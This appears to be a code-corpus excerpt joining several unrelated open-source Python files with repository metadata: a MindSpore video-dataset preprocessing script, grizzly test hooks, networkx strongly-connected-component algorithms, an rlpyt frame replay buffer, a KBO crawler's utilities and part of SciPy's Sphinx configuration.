] | 77 | 2021-10-15T08:32:37.000Z | 2022-03-30T13:09:11.000Z | official/cv/c3d/src/tools/dataset_preprocess.py | leelige/mindspore | 5199e05ba3888963473f2b07da3f7bca5b9ef6dc | [
"Apache-2.0"
] | 3 | 2021-10-30T14:44:57.000Z | 2022-02-14T06:57:57.000Z | official/cv/c3d/src/tools/dataset_preprocess.py | leelige/mindspore | 5199e05ba3888963473f2b07da3f7bca5b9ef6dc | [
"Apache-2.0"
] | 24 | 2021-10-15T08:32:45.000Z | 2022-03-24T18:45:20.000Z | # Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
import os
import sys
import json
import cv2
def unzip_rawrarfile(dataset_name, root_dir_path):
os.chdir(root_dir_path)
if dataset_name == 'HMDB51':
# unrar split file
os.system(command='rar x test_train_splits.rar')
os.system(command='mv ./testTrainMulti_7030_splits ./hmdb-51_txt')
# unrar video file
os.system(command='rar x hmdb51_org.rar hmdb-51/ ')
os.system(command='mkdir hmdb-51_video/')
os.chdir('hmdb-51_video/')
os.system(command='ls ../hmdb-51/*.rar | xargs -n1 rar x')
os.system(command='rm -rf ../hmdb-51/')
elif dataset_name == 'UCF101':
# unrar split file
os.system(command='unzip UCF101TrainTestSplits-RecognitionTask.zip')
os.system(command='mv ./ucfTrainTestlist ./UCF-101_txt')
# unrar video file
os.system(command='rar x UCF101.rar ')
os.system(command='mv UCF-101/ UCF-101_video/')
else:
print('Dataset {} is not surpported !'.format(dataset_name))
raise InterruptedError
def video_2_img(dataset_name, root_dir_path):
if dataset_name == 'HMDB51':
img_dir_name = 'hmdb-51_img'
video_dir_name = 'hmdb-51_video'
elif dataset_name == 'UCF101':
img_dir_name = 'UCF-101_img'
video_dir_name = 'UCF-101_video'
else:
print('Dataset {} is not surpported !'.format(dataset_name))
raise InterruptedError
img_dir = os.path.join(root_dir_path, img_dir_name)
video_dir = os.path.join(root_dir_path, video_dir_name)
for file in os.listdir(video_dir):
file_path = os.path.join(video_dir, file)
output_dir_ = os.path.join(img_dir, file)
for video in os.listdir(file_path):
process_video(video, file, output_dir_, video_dir)
print('DataSet Preprocessing finished.')
def process_video(video, action_name, save_dir, video_dir):
# Initialize a VideoCapture object to read video data into a numpy array
video_filename = video.split('.')[0]
os.makedirs(os.path.join(save_dir, video_filename), exist_ok=True)
capture = cv2.VideoCapture(os.path.join(video_dir, action_name, video))
frame_count = int(capture.get(cv2.CAP_PROP_FRAME_COUNT))
# Make sure splited video has at least 16 frames
EXTRACT_FREQUENCY = 4
if frame_count // EXTRACT_FREQUENCY <= 16:
EXTRACT_FREQUENCY -= 1
count = 0
i = 0
retaining = True
while (count < frame_count and retaining):
retaining, frame = capture.read()
if frame is None:
continue
if count % EXTRACT_FREQUENCY == 0:
cv2.imwrite(filename=os.path.join(save_dir, video_filename, '0000{}.jpg'.format(str(i))), img=frame)
i += 1
count += 1
# Release the VideoCapture once it is no longer needed
capture.release()
print(action_name, video, count, i, frame_count)
def gen_json_HMDB51(root_dir_path, flod=1):
json_root = os.path.join(root_dir_path, 'hmdb-51_json')
txt_root = os.path.join(root_dir_path, 'hmdb-51_txt')
img_path = os.path.join(root_dir_path, 'hmdb-51_img')
os.makedirs(json_root, exist_ok=True)
train_list, test_list, val_list = [], [], []
label_dict = {'brush_hair': 0, 'cartwheel': 1,
'catch': 2, 'chew': 3,
'clap': 4, 'climb_stairs': 5,
'climb': 6, 'dive': 7,
'draw_sword': 8, 'dribble': 9,
'drink': 10, 'eat': 11,
'fall_floor': 12, 'fencing': 13,
'flic_flac': 14, 'golf': 15,
'handstand': 16, 'hit': 17,
'hug': 18, 'jump': 19,
'kick_ball': 20, 'kick': 21,
'kiss': 22, 'laugh': 23,
'pick': 24, 'pour': 25,
'pullup': 26, 'punch': 27,
'push': 28, 'pushup': 29,
'ride_bike': 30, 'ride_horse': 31,
'run': 32, 'shake_hands': 33,
'shoot_ball': 34, 'shoot_bow': 35,
'shoot_gun': 36, 'sit': 37,
'situp': 38, 'smile': 39,
'smoke': 40, 'somersault': 41,
'stand': 42, 'swing_baseball': 43,
'sword_exercise': 44, 'sword': 45,
'talk': 46, 'throw': 47,
'turn': 48, 'walk': 49,
'wave': 50}
for txt_file_name in os.listdir(txt_root):
txt_file_name_ = txt_file_name.split('_test_')[0]
if 'split{}.txt'.format(flod) in txt_file_name:
with open(os.path.join(txt_root, txt_file_name), 'r') as txt_file:
for info_ in txt_file.readlines():
info = info_.strip().split(' ')
if len(info) == 2:
if info[1] == '1':
train_list.append((txt_file_name_, info[0]))
elif info[1] == '2':
test_list.append((txt_file_name_, info[0]))
elif info[1] == '0':
val_list.append((txt_file_name_, info[0]))
else:
print(info)
continue
write_json(train_list, os.path.join(json_root, 'train.json'), img_path, label_dict)
write_json(test_list, os.path.join(json_root, 'test.json'), img_path, label_dict)
write_json(val_list, os.path.join(json_root, 'val.json'), img_path, label_dict)
def gen_json_UCF101(root_dir_path, flod=1):
json_root = os.path.join(root_dir_path, 'UCF-101_json')
txt_root = os.path.join(root_dir_path, 'UCF-101_txt')
img_path = os.path.join(root_dir_path, 'UCF-101_img')
os.makedirs(json_root, exist_ok=True)
train_list, test_list = [], []
label_dict = {}
with open(os.path.join(txt_root, 'classInd.txt'), 'r') as class_file:
for index, line in enumerate(class_file.readlines()):
if line.strip():
label_dict[line.strip().split(' ')[1]] = index
with open(os.path.join(txt_root, 'trainlist0{}.txt'.format(flod)), 'r') as file:
for line in file.readlines():
if line.strip():
line = line.strip().split(' ')[0]
train_list.append(line.split('/'))
with open(os.path.join(txt_root, 'testlist0{}.txt'.format(flod)), 'r') as file:
for line in file.readlines():
if line.strip():
test_list.append(line.strip().split('/'))
write_json(train_list, os.path.join(json_root, 'train.json'), img_path, label_dict)
write_json(test_list, os.path.join(json_root, 'test.json'), img_path, label_dict)
def write_json(video_list, dest_path, img_path, label_dict):
dest_data = []
for action, video in video_list:
video_images = sorted(os.listdir(os.path.join(img_path, action, video.replace('.avi', ''))))
samples = [os.path.join(img_path, action, video.replace('.avi', ''), video_image)
for video_image in video_images]
dest_data_lvl1 = {'frames': []}
for frame in samples:
dest_data_lvl1['frames'].append(
{'img_path': os.path.split(frame)[1], 'actions': [{'action_class': label_dict[action]}]})
dest_data_lvl1['base_path'] = os.path.join(action, video.replace('.avi', ''))
dest_data.append(dest_data_lvl1)
with open(dest_path, 'w') as outfile:
json.dump(dest_data, outfile, indent=4)
def gen_json(dataset, root_dir_path, split_flod):
if dataset == 'HMDB51':
gen_json_HMDB51(root_dir_path, split_flod)
elif dataset == 'UCF101':
gen_json_UCF101(root_dir_path, split_flod)
else:
print('Dataset {} is not surpported !'.format(dataset))
raise InterruptedError
print('Generating Training and Test JSON Files OK !')
def data_preprocess(dataset, root_dir_path, split_flod=1):
if os.path.isfile(root_dir_path):
root_dir_path = os.path.dirname(root_dir_path)
unzip_rawrarfile(dataset, root_dir_path)
video_2_img(dataset, root_dir_path)
gen_json(dataset, root_dir_path, split_flod)
if __name__ == "__main__":
dataset_name_ = sys.argv[1] # Dataset name
root_dir_path_ = sys.argv[2] # Dataset rar file path
split_flod_ = sys.argv[3] # Dataset rar file path
data_preprocess(dataset_name_, root_dir_path_, split_flod_)
| 40.464286 | 112 | 0.6015 |
acf695da5074aa456c41adaee634832500097c22 | 7,763 | py | Python | tests/test_grizzly/test_environment.py | mgor/grizzly | cbcb1b8b44682330f82bb4d24904fb6601b6f1b0 | [
"MIT"
] | null | null | null | tests/test_grizzly/test_environment.py | mgor/grizzly | cbcb1b8b44682330f82bb4d24904fb6601b6f1b0 | [
"MIT"
] | 9 | 2022-01-05T08:53:41.000Z | 2022-03-31T07:26:05.000Z | tests/test_grizzly/test_environment.py | mgor/grizzly | cbcb1b8b44682330f82bb4d24904fb6601b6f1b0 | [
"MIT"
] | null | null | null | from os import environ
from typing import Any, Tuple, Dict, Optional, cast
from time import monotonic as time_monotonic
import pytest
from pytest_mock import MockerFixture
from behave.runner import Context, Runner
from behave.configuration import Configuration
from behave.model import Feature, Step, Status
from grizzly.environment import before_feature, after_feature, before_scenario, after_scenario, before_step, after_step
from grizzly.context import GrizzlyContext
from grizzly.steps.setup import step_setup_variable_value_ask as step_both
from grizzly.steps.background.setup import step_setup_save_statistics as step_background
from grizzly.steps.scenario.setup import step_setup_iterations as step_scenario
from grizzly.tasks import AsyncRequestGroupTask, TimerTask
from ..fixtures import BehaveFixture
def test_before_feature() -> None:
try:
del environ['GRIZZLY_CONTEXT_ROOT']
except:
pass
try:
base_dir = '.'
context = Context(
runner=Runner(
config=Configuration(
command_args=[],
load_config=False,
base_dir=base_dir,
)
)
)
assert not hasattr(context, 'grizzly')
assert environ.get('GRIZZLY_CONTEXT_ROOT', None) is None
before_feature(context)
assert hasattr(context, 'grizzly')
assert context.grizzly.__class__.__name__ == 'GrizzlyContext'
assert environ.get('GRIZZLY_CONTEXT_ROOT', None) == base_dir
context.grizzly = object()
before_feature(context)
assert hasattr(context, 'grizzly')
assert context.grizzly.__class__.__name__ == 'GrizzlyContext'
assert hasattr(context, 'started')
finally:
try:
del environ['GRIZZLY_CONTEXT_ROOT']
except:
pass
def test_after_feature(behave_fixture: BehaveFixture, mocker: MockerFixture) -> None:
behave = behave_fixture.context
feature = Feature(None, None, '', '', scenarios=[behave.scenario])
behave.scenario.steps = [Step(None, None, '', '', '')]
class LocustRunning(Exception):
pass
def locustrun_running(context: Context) -> None:
raise LocustRunning()
mocker.patch(
'grizzly.environment.locustrun',
locustrun_running,
)
# do not start locust if feature failed
feature.set_status(Status.failed)
after_feature(behave, feature)
# start locust only if it's not a dry run and the feature passed
feature.set_status(Status.passed)
with pytest.raises(LocustRunning):
after_feature(behave, feature)
def locustrun_return_not_0(context: Context) -> int:
return 1
mocker.patch(
'grizzly.environment.locustrun',
locustrun_return_not_0,
)
assert feature.status == Status.passed
after_feature(behave, feature)
assert feature.status == Status.failed
assert feature.duration == 0.0
behave.start = time_monotonic() - 1.0
after_feature(behave, feature)
assert feature.duration > 0.0
def test_before_scenario(behave_fixture: BehaveFixture, mocker: MockerFixture) -> None:
behave = behave_fixture.context
class MatchedStep:
def __init__(self, name: str) -> None:
if name == 'background':
self.func = step_background
elif name == 'both':
self.func = step_both
elif name == 'local':
self.func = self.step_local
else:
self.func = step_scenario
def step_local(self) -> None:
pass
def find_match(step: Step, *args: Tuple[Any, ...], **kwargs: Dict[str, Any]) -> Optional[MatchedStep]:
if step is None:
return None
return MatchedStep(step.name)
mocker.patch(
'tests.fixtures.step_registry.find_match',
find_match,
)
background_scenario_step = Step(filename=None, line=None, keyword='', step_type='step', name='')
background_background_step = Step(filename=None, line=None, keyword='', step_type='step', name='background')
scenario_background_step = Step(filename=None, line=None, keyword='', step_type='step', name='background')
both_step = Step(filename=None, line=None, keyword='', step_type='step', name='both')
local_step = Step(filename=None, line=None, keyword='', step_type='step', name='local')
behave.scenario.name = 'Test Scenario'
behave.scenario.background.steps = [
background_scenario_step,
background_background_step,
both_step,
local_step,
None,
]
behave.scenario.steps += [scenario_background_step, both_step, local_step, None]
assert len(behave.scenario.steps) == 5
assert len(behave.scenario.background.steps) == 5
grizzly = cast(GrizzlyContext, behave.grizzly)
assert len(grizzly.scenarios()) == 0
before_scenario(behave, behave.scenario)
assert len(grizzly.scenarios()) == 1
assert grizzly.scenarios()[0] is grizzly.scenario
assert grizzly.scenario.name == 'Test Scenario'
assert getattr(behave.scenario.background.steps[0], 'location_status', None) == 'incorrect'
assert getattr(behave.scenario.background.steps[1], 'location_status', None) is None
assert getattr(behave.scenario.background.steps[2], 'location_status', None) is None
assert getattr(behave.scenario.background.steps[3], 'location_status', None) is None
assert getattr(behave.scenario.steps[0], 'location_status', None) is None
assert getattr(behave.scenario.steps[1], 'location_status', None) == 'incorrect'
assert getattr(behave.scenario.steps[2], 'location_status', None) is None
assert getattr(behave.scenario.steps[3], 'location_status', None) is None
grizzly.state.background_section_done = True
grizzly.scenarios.clear()
before_scenario(behave, behave.scenario)
assert behave.scenario.background is None
def test_after_scenario(behave_fixture: BehaveFixture) -> None:
behave = behave_fixture.context
grizzly = behave_fixture.grizzly
grizzly.scenario.async_group = AsyncRequestGroupTask(name='test-async-1')
with pytest.raises(AssertionError) as ae:
after_scenario(behave)
assert str(ae.value) == 'async request group "test-async-1" has not been closed'
grizzly.scenario.async_group = None
grizzly.scenario.timers['test-timer-1'] = TimerTask('test-timer-1')
grizzly.scenario.timers['test-timer-2'] = TimerTask('test-timer-2')
with pytest.raises(AssertionError) as ae:
after_scenario(behave)
assert str(ae.value) == 'timers test-timer-1, test-timer-2 has not been closed'
grizzly.scenario.timers.clear()
grizzly.state.background_section_done = False
assert not grizzly.state.background_section_done
after_scenario(behave)
assert getattr(grizzly.state, 'background_section_done', False)
after_scenario(behave)
assert grizzly.state.background_section_done
def test_before_step(behave_fixture: BehaveFixture) -> None:
behave = behave_fixture.context
step = Step(filename=None, line=None, keyword='', step_type='step', name='')
behave.step = None
before_step(behave, step)
assert behave.step is step
setattr(step, 'location_status', 'incorrect')
with pytest.raises(AssertionError):
before_step(behave, step)
setattr(step, 'location_status', 'incorrect')
with pytest.raises(AssertionError):
before_step(behave, step)
def test_after_step(behave_fixture: BehaveFixture) -> None:
behave = behave_fixture.context
step = Step(filename=None, line=None, keyword='', step_type='step', name='')
after_step(behave, step)
| 31.815574 | 119 | 0.687106 |
acf6968bf42c8363e8a9f97dc5d88bdeadc8b88b | 11,140 | py | Python | networkx/algorithms/components/strongly_connected.py | jmmcd/networkx | 207ff7d1e9bfaff013ac77c8d6bb79619892c994 | [
"BSD-3-Clause"
] | 1 | 2020-08-08T21:52:34.000Z | 2020-08-08T21:52:34.000Z | networkx/algorithms/components/strongly_connected.py | jmmcd/networkx | 207ff7d1e9bfaff013ac77c8d6bb79619892c994 | [
"BSD-3-Clause"
] | null | null | null | networkx/algorithms/components/strongly_connected.py | jmmcd/networkx | 207ff7d1e9bfaff013ac77c8d6bb79619892c994 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright (C) 2004-2019 by
# Aric Hagberg <hagberg@lanl.gov>
# Dan Schult <dschult@colgate.edu>
# Pieter Swart <swart@lanl.gov>
# All rights reserved.
# BSD license.
#
# Authors: Eben Kenah
# Aric Hagberg (hagberg@lanl.gov)
# Christopher Ellison
# Ben Edwards (bedwards@cs.unm.edu)
"""Strongly connected components."""
import networkx as nx
from networkx.utils.decorators import not_implemented_for
__all__ = ['number_strongly_connected_components',
'strongly_connected_components',
'is_strongly_connected',
'strongly_connected_components_recursive',
'kosaraju_strongly_connected_components',
'condensation']
@not_implemented_for('undirected')
def strongly_connected_components(G):
"""Generate nodes in strongly connected components of graph.
Parameters
----------
G : NetworkX Graph
A directed graph.
Returns
-------
comp : generator of sets
A generator of sets of nodes, one for each strongly connected
component of G.
Raises
------
NetworkXNotImplemented :
If G is undirected.
Examples
--------
Generate a sorted list of strongly connected components, largest first.
>>> G = nx.cycle_graph(4, create_using=nx.DiGraph())
>>> nx.add_cycle(G, [10, 11, 12])
>>> [len(c) for c in sorted(nx.strongly_connected_components(G),
... key=len, reverse=True)]
[4, 3]
If you only want the largest component, it's more efficient to
use max instead of sort.
>>> largest = max(nx.strongly_connected_components(G), key=len)
See Also
--------
connected_components
weakly_connected_components
kosaraju_strongly_connected_components
Notes
-----
Uses Tarjan's algorithm[1]_ with Nuutila's modifications[2]_.
Nonrecursive version of algorithm.
References
----------
.. [1] Depth-first search and linear graph algorithms, R. Tarjan
SIAM Journal of Computing 1(2):146-160, (1972).
.. [2] On finding the strongly connected components in a directed graph.
E. Nuutila and E. Soisalon-Soinen
Information Processing Letters 49(1): 9-14, (1994)..
"""
preorder = {}
lowlink = {}
scc_found = set()
scc_queue = []
i = 0 # Preorder counter
for source in G:
if source not in scc_found:
queue = [source]
while queue:
v = queue[-1]
if v not in preorder:
i = i + 1
preorder[v] = i
done = True
for w in G[v]:
if w not in preorder:
queue.append(w)
done = False
break
if done:
lowlink[v] = preorder[v]
for w in G[v]:
if w not in scc_found:
if preorder[w] > preorder[v]:
lowlink[v] = min([lowlink[v], lowlink[w]])
else:
lowlink[v] = min([lowlink[v], preorder[w]])
queue.pop()
if lowlink[v] == preorder[v]:
scc = {v}
while scc_queue and preorder[scc_queue[-1]] > preorder[v]:
k = scc_queue.pop()
scc.add(k)
scc_found.update(scc)
yield scc
else:
scc_queue.append(v)
@not_implemented_for('undirected')
def kosaraju_strongly_connected_components(G, source=None):
"""Generate nodes in strongly connected components of graph.
Parameters
----------
G : NetworkX Graph
A directed graph.
Returns
-------
comp : generator of sets
A genrator of sets of nodes, one for each strongly connected
component of G.
Raises
------
NetworkXNotImplemented:
If G is undirected.
Examples
--------
Generate a sorted list of strongly connected components, largest first.
>>> G = nx.cycle_graph(4, create_using=nx.DiGraph())
>>> nx.add_cycle(G, [10, 11, 12])
>>> [len(c) for c in sorted(nx.kosaraju_strongly_connected_components(G),
... key=len, reverse=True)]
[4, 3]
If you only want the largest component, it's more efficient to
use max instead of sort.
>>> largest = max(nx.kosaraju_strongly_connected_components(G), key=len)
See Also
--------
strongly_connected_components
Notes
-----
Uses Kosaraju's algorithm.
"""
with nx.utils.reversed(G):
post = list(nx.dfs_postorder_nodes(G, source=source))
seen = set()
while post:
r = post.pop()
if r in seen:
continue
c = nx.dfs_preorder_nodes(G, r)
new = {v for v in c if v not in seen}
yield new
seen.update(new)
@not_implemented_for('undirected')
def strongly_connected_components_recursive(G):
"""Generate nodes in strongly connected components of graph.
Recursive version of algorithm.
Parameters
----------
G : NetworkX Graph
A directed graph.
Returns
-------
comp : generator of sets
A generator of sets of nodes, one for each strongly connected
component of G.
Raises
------
NetworkXNotImplemented :
If G is undirected.
Examples
--------
Generate a sorted list of strongly connected components, largest first.
>>> G = nx.cycle_graph(4, create_using=nx.DiGraph())
>>> nx.add_cycle(G, [10, 11, 12])
>>> [len(c) for c in sorted(nx.strongly_connected_components_recursive(G),
... key=len, reverse=True)]
[4, 3]
If you only want the largest component, it's more efficient to
use max instead of sort.
>>> largest = max(nx.strongly_connected_components_recursive(G), key=len)
To create the induced subgraph of the components use:
>>> S = [G.subgraph(c).copy() for c in nx.weakly_connected_components(G)]
See Also
--------
connected_components
Notes
-----
Uses Tarjan's algorithm[1]_ with Nuutila's modifications[2]_.
References
----------
.. [1] Depth-first search and linear graph algorithms, R. Tarjan
SIAM Journal of Computing 1(2):146-160, (1972).
.. [2] On finding the strongly connected components in a directed graph.
E. Nuutila and E. Soisalon-Soinen
Information Processing Letters 49(1): 9-14, (1994)..
"""
def visit(v, cnt):
root[v] = cnt
visited[v] = cnt
cnt += 1
stack.append(v)
for w in G[v]:
if w not in visited:
for c in visit(w, cnt):
yield c
if w not in component:
root[v] = min(root[v], root[w])
if root[v] == visited[v]:
component[v] = root[v]
tmpc = {v} # hold nodes in this component
while stack[-1] != v:
w = stack.pop()
component[w] = root[v]
tmpc.add(w)
stack.remove(v)
yield tmpc
visited = {}
component = {}
root = {}
cnt = 0
stack = []
for source in G:
if source not in visited:
for c in visit(source, cnt):
yield c
@not_implemented_for('undirected')
def number_strongly_connected_components(G):
"""Returns number of strongly connected components in graph.
Parameters
----------
G : NetworkX graph
A directed graph.
Returns
-------
n : integer
Number of strongly connected components
Raises
------
NetworkXNotImplemented:
If G is undirected.
See Also
--------
strongly_connected_components
number_connected_components
number_weakly_connected_components
Notes
-----
For directed graphs only.
"""
return sum(1 for scc in strongly_connected_components(G))
@not_implemented_for('undirected')
def is_strongly_connected(G):
"""Test directed graph for strong connectivity.
A directed graph is strongly connected if and only if every vertex in
the graph is reachable from every other vertex.
Parameters
----------
G : NetworkX Graph
A directed graph.
Returns
-------
connected : bool
True if the graph is strongly connected, False otherwise.
Raises
------
NetworkXNotImplemented:
If G is undirected.
See Also
--------
is_weakly_connected
is_semiconnected
is_connected
is_biconnected
strongly_connected_components
Notes
-----
For directed graphs only.
"""
if len(G) == 0:
raise nx.NetworkXPointlessConcept(
"""Connectivity is undefined for the null graph.""")
return len(list(strongly_connected_components(G))[0]) == len(G)
@not_implemented_for('undirected')
def condensation(G, scc=None):
"""Returns the condensation of G.
The condensation of G is the graph with each of the strongly connected
components contracted into a single node.
Parameters
----------
G : NetworkX DiGraph
A directed graph.
scc: list or generator (optional, default=None)
Strongly connected components. If provided, the elements in
`scc` must partition the nodes in `G`. If not provided, it will be
calculated as scc=nx.strongly_connected_components(G).
Returns
-------
C : NetworkX DiGraph
The condensation graph C of G. The node labels are integers
corresponding to the index of the component in the list of
strongly connected components of G. C has a graph attribute named
'mapping' with a dictionary mapping the original nodes to the
nodes in C to which they belong. Each node in C also has a node
attribute 'members' with the set of original nodes in G that
form the SCC that the node in C represents.
Raises
------
NetworkXNotImplemented:
If G is undirected.
Notes
-----
After contracting all strongly connected components to a single node,
the resulting graph is a directed acyclic graph.
"""
if scc is None:
scc = nx.strongly_connected_components(G)
mapping = {}
members = {}
C = nx.DiGraph()
# Add mapping dict as graph attribute
C.graph['mapping'] = mapping
if len(G) == 0:
return C
for i, component in enumerate(scc):
members[i] = component
mapping.update((n, i) for n in component)
number_of_components = i + 1
C.add_nodes_from(range(number_of_components))
C.add_edges_from((mapping[u], mapping[v]) for u, v in G.edges()
if mapping[u] != mapping[v])
# Add a list of members (ie original nodes) to each node (ie scc) in C.
nx.set_node_attributes(C, members, 'members')
return C
| 27.919799 | 82 | 0.581867 |
acf697521ba2301a3e281a9c4ef891400c0ba9a1 | 2,760 | py | Python | rlpyt/replays/frame.py | vzhuang/rlpyt | 3abf873e4bae0cd9cccbb9e5c9cc4c875710f6b6 | [
"MIT"
] | 5 | 2021-02-19T01:35:22.000Z | 2022-03-29T20:48:34.000Z | rlpyt/replays/frame.py | vzhuang/rlpyt | 3abf873e4bae0cd9cccbb9e5c9cc4c875710f6b6 | [
"MIT"
] | 3 | 2021-09-08T03:31:49.000Z | 2022-03-12T00:59:45.000Z | rlpyt/replays/frame.py | vzhuang/rlpyt | 3abf873e4bae0cd9cccbb9e5c9cc4c875710f6b6 | [
"MIT"
] | 2 | 2021-04-17T09:11:56.000Z | 2022-03-24T04:21:17.000Z |
from rlpyt.utils.buffer import buffer_from_example, get_leading_dims
from rlpyt.utils.collections import namedarraytuple
from rlpyt.utils.logging import logger
BufferSamples = None
class FrameBufferMixin:
"""
Like n-step return buffer but expects multi-frame input observation where
each new observation has one new frame and the rest old; stores only
unique frames to save memory. Samples observation should be shaped:
[T,B,C,..] with C the number of frames. Expects frame order: OLDEST to
NEWEST.
A special method for replay will be required to piece the frames back
together into full observations.
Latest n_steps up to cursor temporarilty invalid because "next" not yet
written. Cursor timestep invalid because previous action and reward
overwritten. NEW: Next n_frames-1 invalid because observation history
frames overwritten.
"""
def __init__(self, example, **kwargs):
field_names = [f for f in example._fields if f != "observation"]
global BufferSamples
BufferSamples = namedarraytuple("BufferSamples", field_names)
buffer_example = BufferSamples(*(v for k, v in example.items()
if k != "observation"))
super().__init__(example=buffer_example, **kwargs)
# Equivalent to image.shape[0] if observation is image array (C,H,W):
self.n_frames = n_frames = get_leading_dims(example.observation,
n_dim=1)[0]
logger.log(f"Frame-based buffer using {n_frames}-frame sequences.")
# frames: oldest stored at t; duplicate n_frames - 1 beginning & end.
self.samples_frames = buffer_from_example(example.observation[0],
(self.T + n_frames - 1, self.B),
share_memory=self.async_) # [T+n_frames-1,B,H,W]
# new_frames: shifted so newest stored at t; no duplication.
self.samples_new_frames = self.samples_frames[n_frames - 1:] # [T,B,H,W]
self.off_forward = max(self.off_forward, n_frames - 1)
def append_samples(self, samples):
"""Appends all samples except for the `observation` as normal.
Only the new frame in each observation is recorded."""
t, fm1 = self.t, self.n_frames - 1
buffer_samples = BufferSamples(*(v for k, v in samples.items()
if k != "observation"))
T, idxs = super().append_samples(buffer_samples)
self.samples_new_frames[idxs] = samples.observation[:, :, -1]
if t == 0: # Starting: write early frames
for f in range(fm1):
self.samples_frames[f] = samples.observation[0, :, f]
elif self.t < t: # Wrapped: copy duplicate frames.
self.samples_frames[:fm1] = self.samples_frames[-fm1:]
return T, idxs
| 46 | 81 | 0.671377 |
acf6980ffda245c95ff4027da89d21a807a4f4bd | 5,680 | py | Python | legacy/utils.py | yagongso/KBO_crawler | c799b5c010a78ee2ca96a5a279655e962c4d1f40 | [
"MIT"
] | 7 | 2018-03-31T12:02:40.000Z | 2021-04-30T00:22:28.000Z | legacy/utils.py | yagongso/KBO_crawler | c799b5c010a78ee2ca96a5a279655e962c4d1f40 | [
"MIT"
] | null | null | null | legacy/utils.py | yagongso/KBO_crawler | c799b5c010a78ee2ca96a5a279655e962c4d1f40 | [
"MIT"
] | 3 | 2018-05-17T07:45:09.000Z | 2019-01-18T11:59:29.000Z | #utils.py
import datetime
import argparse
import http.client
from urllib.parse import urlparse
from urllib.request import urlopen
import time
import requests
def get_args(output, options):
# convert arguments
# check if not number, integer
parser = argparse.ArgumentParser(description='Get pitch by pitch data.')
parser.add_argument('dates',
metavar='dates',
type=int,
nargs='*',
default=datetime.datetime.now().year,
help='start/end (month/year); year > 2007')
parser.add_argument('-c',
action='store_true',
help='convert pitch data to .csv format')
parser.add_argument('-d',
action='store_true',
help='Download pitch data')
parser.add_argument('-p',
action='store_true',
help='Download pitch f/x data only')
args = parser.parse_args()
options.append(args.c)
options.append(args.d)
options.append(args.p)
if (args.c and args.p) or (args.c and args.d) or (args.d and args.p):
print('choose one option at once!\n')
parser.print_help()
exit(1)
dates = args.dates
now = datetime.datetime.now()
if type(dates) is int:
# month or year?
if dates > 12:
# year
if (dates < 2008) or (dates > now.year):
print('invalid year')
exit(1)
else:
year = dates
if year == now.year:
# current season
if now.month < 3:
print('invalid year : season has not begun...')
exit(1)
else:
# dates = [now.year, now.year, 3, now.month]
output.append(3)
output.append(now.month)
else:
# previous season
# dates = [year, year, 3, 10]
output.append(3)
output.append(10)
output.append(year)
output.append(year)
elif dates > 0:
# month
if (dates < 3) or (dates > 10):
print('invalid month : possible range is 3~10')
exit(1)
else:
month = dates
if month <= now.month:
# dates = [now.year, now.year, month, month]
output.append(month)
output.append(month)
output.append(now.year)
output.append(now.year)
else:
# trying for future...
print('invalid month : current month is {}; you entered{}.'.format(now.month, month))
exit(1)
else:
print('invalid parameter')
exit(1)
elif len(dates) > 4:
print('too many date option')
exit(1)
else:
months = []
years = []
for d in dates:
if (d > 12) & (d > 2007) & (d <= now.year):
years.append(d)
elif (d >= 1) & (d <= 12):
months.append(d)
else:
print('invalid date')
print('possible year range: 2008~%d'%(now.year))
print('possible month range: 1~12')
exit(1)
if len(years) > 2:
print('too many year')
exit(1)
if len(months) > 2:
print('too many month')
exit(1)
mmin = 3
mmax = 3
ymin = now.year
ymax = now.year
if len(months) == 0:
mmin = 3
mmax = 10
elif len(months) == 1:
mmin = mmax = months[0]
else:
mmin = min(months)
mmax = max(months)
if len(years) == 0:
ymin = now.year
ymax = now.year
elif len(years) == 1:
ymin = ymax = years[0]
else:
ymin = min(years)
ymax = max(years)
output.append(mmin)
output.append(mmax)
output.append(ymin)
output.append(ymax)
return parser
def print_progress(bar_prefix, total, done, skipped):
if total > 30:
progress_pct = (float(done + skipped) / float(total))
bar = '+' * int(progress_pct * 30) + '-' * (30 - int(progress_pct * 30))
print('\r{}[{}] {} / {}, {:2.1f} %'.format(bar_prefix, bar, (done + skipped), total,
progress_pct * 100), end="")
elif total > 0:
bar = '+' * (done + skipped) + '-' * (total - done - skipped)
print('\r{}[{}] {} / {}, {:2.1f} %'.format(bar_prefix, bar, (done + skipped), total,
float(done + skipped) / float(total) * 100),
end="")
def check_url(url):
p = urlparse(url)
conn = http.client.HTTPConnection(p.netloc)
conn.request('HEAD', p.path)
resp = conn.getresponse()
return resp.status < 400
def check_url2(url):
resp = requests.get(url)
status = resp.status_code < 400
resp.close()
return status
def retry_urlopen(url, num_of_retries=10, time_interval=2):
page = None
for _ in range(num_of_retries):
try:
page = urlopen(url, timeout=10)
return page
break
except:
time.sleep(time_interval)
else:
raise
| 29.430052 | 105 | 0.459331 |
acf698e358de22b03147c64d210d31a949a99e97 | 16,004 | py | Python | doc/source/conf.py | lorentzenchr/scipy | 393a05ee927883ad6316b7092c851afea8f16816 | [
"BSD-3-Clause"
] | 9,095 | 2015-01-02T18:24:23.000Z | 2022-03-31T20:35:31.000Z | doc/source/conf.py | lorentzenchr/scipy | 393a05ee927883ad6316b7092c851afea8f16816 | [
"BSD-3-Clause"
] | 11,500 | 2015-01-01T01:15:30.000Z | 2022-03-31T23:07:35.000Z | doc/source/conf.py | lorentzenchr/scipy | 393a05ee927883ad6316b7092c851afea8f16816 | [
"BSD-3-Clause"
] | 5,838 | 2015-01-05T11:56:42.000Z | 2022-03-31T23:21:19.000Z | # -*- coding: utf-8 -*-
import sys, os, re
import glob
from datetime import date
import warnings
import numpy as np
# Currently required to build scipy.fft docs
os.environ['_SCIPY_BUILDING_DOC'] = 'True'
# Check Sphinx version
import sphinx
if sphinx.__version__ < "2.0":
raise RuntimeError("Sphinx 2.0 or newer required")
needs_sphinx = '2.0'
# Workaround for sphinx-doc/sphinx#6573
# ua._Function should not be treated as an attribute
from sphinx.util import inspect
import scipy._lib.uarray as ua
old_isdesc = inspect.isdescriptor
inspect.isdescriptor = (lambda obj: old_isdesc(obj)
and not isinstance(obj, ua._Function))
